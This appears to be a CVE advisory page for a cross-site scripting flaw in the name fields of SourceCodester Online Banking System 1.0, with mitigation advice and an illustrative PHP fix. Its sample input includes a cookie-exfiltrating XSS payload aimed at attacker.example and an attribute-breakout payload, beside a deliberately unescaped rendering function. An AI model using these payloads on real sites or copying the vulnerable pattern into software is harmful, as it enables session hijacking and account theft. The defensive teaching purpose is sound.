Platform: php
Component: online-banking-system
Fixed in: 1.0.1
A cross-site scripting (XSS) vulnerability has been identified in SourceCodester Online Banking System version 1.0. The flaw is in the /?page=user endpoint and is triggered by manipulating the First Name and Last Name parameters, which the application renders into the page without adequate output encoding. Successful exploitation lets an attacker inject script that runs in other users' browsers, exposing their sessions and data. Version 1.0.1 addresses the issue.
Because the injected JavaScript executes in the context of the victim's browser session with the banking application, the realistic consequences are session hijacking, account takeover, and theft of sensitive information such as login credentials and financial data. An attacker could also redirect users to a malicious site or deface the online banking interface. Given what an online banking system protects, the impact of a successful attack is significant even though the injection point is a simple profile field.
This vulnerability is publicly known and an exploit is available, which raises the likelihood of opportunistic exploitation. It was added to the NVD database on 2025-12-08. The CVSS severity is rated LOW, reflecting the limited impact the scoring assigns to a single XSS in a user-facing form, but the public availability of an exploit still warrants prompt patching.
Exploit Status: public exploit available
EPSS: 0.04% (11th percentile)
CISA SSVC: not provided
CVSS Vector: not provided
The primary mitigation for CVE-2025-14221 is to upgrade to version 1.0.1 of SourceCodester Online Banking System without delay. If upgrading is not immediately feasible, apply context-appropriate output encoding wherever the First Name and Last Name values are rendered into HTML, and add input validation on those fields as defence in depth so that markup never reaches the database in the first place. A web application firewall (WAF) configured to detect and block common XSS payloads can provide a temporary layer of protection; review and update its rulesets regularly, since signature-based filtering is routinely bypassed by encoding variations.
If a patched version cannot be deployed, discontinue use of the application rather than running it exposed. The durable fix inside the code is to HTML-escape the 'First Name' and 'Last Name' values at the point of output (for example with PHP's htmlspecialchars() using ENT_QUOTES and an explicit UTF-8 charset), and to reject names containing angle brackets or quotes at validation time.
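As an added example (this is not code from the Online Banking System project, whose source this page does not show), the unescaped-output pattern the advisory describes is shown beside the encoded form, with input validation as a secondary control. The function names, the `firstname`/`lastname` array keys and the sample payloads are assumptions for illustration:

```php
<?php
// Added example, not code from the SourceCodester Online Banking System.
// The function names, the 'firstname'/'lastname' keys and the payloads
// below are assumptions chosen to illustrate the bug class and its fix.

declare(strict_types=1);

// Vulnerable pattern: profile fields are concatenated straight into the
// page, so a "<script>" tag in a name runs in every browser that renders
// the profile, and a quote in the attribute value breaks out of it.
function render_profile_vulnerable(array $user): string
{
    return '<div class="profile">'
         . '<h2>' . $user['firstname'] . ' ' . $user['lastname'] . '</h2>'
         . '<input type="text" name="firstname" value="' . $user['firstname'] . '">'
         . '</div>';
}

// Hardened pattern: encode for the context the value lands in.
// htmlspecialchars() with ENT_QUOTES covers element text and both
// double- and single-quoted attribute values; the explicit charset
// prevents multibyte sequences from confusing the encoder.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_profile_hardened(array $user): string
{
    return '<div class="profile">'
         . '<h2>' . h($user['firstname']) . ' ' . h($user['lastname']) . '</h2>'
         . '<input type="text" name="firstname" value="' . h($user['firstname']) . '">'
         . '</div>';
}

// Defence in depth on the way in: a person's name has no business holding
// angle brackets or quotes, so reject those at validation time. This does
// NOT replace output encoding; it only narrows what reaches the database.
function validate_name(string $name): bool
{
    return preg_match('/^[\p{L}\p{M}\' .-]{1,64}$/u', $name) === 1;
}

// Constructed sample input standing in for the First Name / Last Name
// parameters submitted to /?page=user. The second value targets the
// attribute context rather than the element body.
$sample = [
    'firstname' => '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'lastname'  => '" onfocus="alert(1)" autofocus="',
];

echo "Vulnerable output:\n", render_profile_vulnerable($sample), "\n\n";
echo "Hardened output:\n", render_profile_hardened($sample), "\n\n";
echo 'Validation accepts the script payload: ', var_export(validate_name($sample['firstname']), true), "\n";
echo 'Validation accepts "O\'Brien": ', var_export(validate_name("O'Brien"), true), "\n";
```

Run it with `php example.php`: the vulnerable rendering emits the `<script>` tag and a broken-out `onfocus` attribute verbatim, while the hardened rendering turns `<`, `>` and `"` into `&lt;`, `&gt;` and `&quot;` so the browser displays the payload as text. The validator rejects the script payload but still accepts a legitimate name containing an apostrophe, which is why it is safe to add as a second layer without breaking real users.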
CVE-2025-14221 is a cross-site scripting (XSS) vulnerability affecting SourceCodester Online Banking System version 1.0, allowing attackers to inject malicious scripts through the First Name and Last Name parameters of the /?page=user endpoint.
You are affected if you are running SourceCodester Online Banking System version 1.0. Upgrade to version 1.0.1 to mitigate the risk.
The recommended fix is to upgrade to version 1.0.1. As a temporary workaround, implement input validation and sanitization on the First Name/Last Name fields.
Yes, an exploit for CVE-2025-14221 is publicly available, indicating a potential for active exploitation.
Refer to the SourceCodester website or their official communication channels for the advisory regarding CVE-2025-14221.